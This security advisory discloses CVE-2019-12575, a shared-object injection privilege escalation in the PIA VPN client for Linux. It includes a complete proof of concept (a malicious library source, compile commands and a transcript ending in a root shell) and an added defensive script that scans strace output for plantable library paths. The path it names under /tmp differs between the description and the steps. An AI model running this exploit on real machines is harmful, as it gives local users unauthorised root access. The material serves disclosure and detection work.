Allele Security Alert
ASA-2019-00381
Identifier(s)
ASA-2019-00381, CVE-2019-12575
Title
Shared Object Injection
Vendor(s)
London Trust Media
Product(s)
Private Internet Access (PIA) VPN Client
Affected version(s)
Private Internet Access (PIA) VPN Client for Linux version v82
Fixed version(s)
Private Internet Access (PIA) VPN Client for Linux version v1.2.1 or later
Proof of concept
Yes
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to run arbitrary code with elevated privileges.
Technical details
The PIA Linux binary root_runner.64 is setuid root. This binary executes /opt/pia/ruby/64/ruby, which in turn attempts to load several libraries under /tmp/ruby-deploy.old/lib. Because /tmp is world-writable and the directory does not exist by default, a local unprivileged user can create it and place a malicious library under this path; the root-owned process loads it, so the library's initialiser runs as the root user.
All steps below are executed as a low-privileged user.
Step 1 – Create the following directory
mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
Step 2 – Create woot.c to execute a shell when loaded
cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void woot(){
    setreuid(0,0);
    execl("/bin/sh","/bin/sh",NULL);
}
EOF
Step 3 – Compile the malicious library. -Wl,-init,woot registers woot() as the shared object's initialiser, so it runs as soon as the library is loaded, without any symbol being called.
gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall \
    -shared \
    -Wl,-soname,encdb.so.so \
    -Wl,-init,woot \
    -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
Step 4 – Execute root_runner.64; the library is loaded by the root-owned ruby process and drops a root shell.
/opt/pia/root_runner/root_runner.64
Example
user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ ./pia-ruby-exploit.sh
+ LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ cat
+ gcc -fPIC -o woot.o -Wall -c woot.c
+ gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
+ /opt/pia/root_runner/root_runner.64
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#
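The class of bug above (a privileged process searching for shared objects under a path an unprivileged user can create) can be hunted for on other setuid binaries. The following is an added check written for this alert, not code from the advisory author or the vendor. It assumes a trace of failed library opens has been captured (for example with `strace -f -e trace=openat` on the target binary; the sample lines embedded here are constructed, not a real trace of PIA) and flags every .so path that failed with ENOENT whose nearest existing ancestor directory is world-writable, which is exactly the condition the PoC exploits with /tmp.

```shell
#!/bin/sh
# Constructed sample of strace-style output (not from the advisory). The
# second and fourth lines show the loader failing to open a shared object;
# only the one under world-writable /tmp is plantable by a local user.
SAMPLE_TRACE='openat(AT_FDCWD, "/opt/pia/ruby/64/lib/libruby.so.2.4", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
openat(AT_FDCWD, "/opt/pia/ruby/64/lib/ruby/2.4.0/enc/trans/transdb.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)'

# nearest_existing_dir PATH: print the closest ancestor directory that exists.
# A missing library path is only plantable if a user can create the missing
# components, which depends on the permissions of this ancestor.
nearest_existing_dir() {
    d=$(dirname "$1")
    while [ ! -d "$d" ]; do
        d=$(dirname "$d")
    done
    printf '%s\n' "$d"
}

# world_writable DIR: succeed if "others" hold write permission on DIR.
# Uses the octal mode so the result does not depend on who runs the check.
world_writable() {
    mode=$(stat -c %a "$1") || return 1
    last=$(printf '%s' "$mode" | tail -c 1)
    [ $((last & 2)) -ne 0 ]
}

# find_injectable_lib_paths: read strace lines on stdin and print each .so
# path that failed with ENOENT and sits under a world-writable directory.
find_injectable_lib_paths() {
    grep -E 'openat\(.*\.so[^"]*".*ENOENT' |
    sed -E 's/^openat\([^"]*"([^"]+)".*/\1/' |
    while IFS= read -r so; do
        anc=$(nearest_existing_dir "$so")
        if world_writable "$anc"; then
            printf '%s (creatable under world-writable %s)\n' "$so" "$anc"
        fi
    done
}

# Example run over the constructed trace.
printf '%s\n' "$SAMPLE_TRACE" | find_injectable_lib_paths
```

Run the real trace as the unprivileged user: the kernel drops the setuid bit for a traced process, but the search for libraries still happens, so the ENOENT paths are visible without root. Any hit under /tmp, /var/tmp, /dev/shm or a user's home directory is a candidate for the same injection, and the fix on the vendor side is to stop searching user-controllable paths from a privileged process.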
Credits
Rich Mirch
Reference(s)
PIA Linux, macOS Privilege Escalation: Shared Object Injection
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12575.txt
CVE-2019-12575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12575
CVE-2019-12575
https://nvd.nist.gov/vuln/detail/CVE-2019-12575
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 25, 2019